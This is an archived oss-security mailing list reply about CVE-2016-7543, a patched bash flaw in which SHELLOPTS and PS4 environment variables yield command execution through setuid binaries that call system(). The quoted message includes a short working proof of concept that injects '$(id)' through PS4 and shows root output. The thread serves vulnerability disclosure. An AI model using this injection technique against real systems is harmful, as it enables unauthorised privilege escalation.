[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] Re: CVE-2016-7543 -- bash SHELLOPTS+PS4
From: Tavis Ormandy <taviso () cmpxchg8b ! com>
Date: 2016-09-26 23:01:03
Message-ID: mpro.oe4vxq069usvx05jg.taviso () cmpxchg8b ! com
[Download RAW message or body]
up201407890@alunos.dcc.fc.up.pt wrote:
> The recent bash 4.4 patched an old attack vector regarding specially
> crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries
> using system()/popen().
>
> https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html
>
> "nn. Shells running as root no longer inherit PS4 from the environment,
> closing a security hole involving PS4 expansion performing command
> substitution."
>
> # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' #
> chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06
> ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat
> Sep 10 18:06:36 WET 2016
>
> Sorry Tavis :P
>
Hah, nice work :-)
Tavis.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic